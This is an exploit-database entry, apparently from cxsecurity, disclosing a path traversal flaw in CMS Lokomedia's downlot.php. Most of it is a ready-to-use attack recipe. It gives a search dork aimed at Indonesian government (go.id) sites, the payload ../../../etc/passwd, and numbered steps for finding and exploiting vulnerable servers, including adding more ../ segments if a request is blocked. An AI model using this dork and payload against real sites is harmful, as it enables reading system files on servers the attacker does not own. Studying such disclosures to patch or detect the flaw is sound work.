CMS Lokomedia -Local File Download

2018.12.17
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

CMS LOKOMEDIA - LOCAL FILE DOWNLOAD Author: security007 Tested on: ubuntu 18.04 Vendor Homepage: http://www.lokomedia.web.id/ Dork: inurl: /downlot.php site: go.id Vulnerable File: downlot.php Vulnerable Parameters:? File = Exploit: /downlot.php?file=../../../etc/passwd Proof of Concept: 1. Dorking with your favorite search engine 2. Enter the exploit in url ---> example: www.lokmed.com/downlot.php?file=../../../etc/passwd 3. If vuln, then the passwd file will automatically download 4. If the forbidden, then try increasing the directory by adding dot dot slash (../), or maybe the web has been patched Greets: Allah, ProblemCyberTeam, All my friends


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top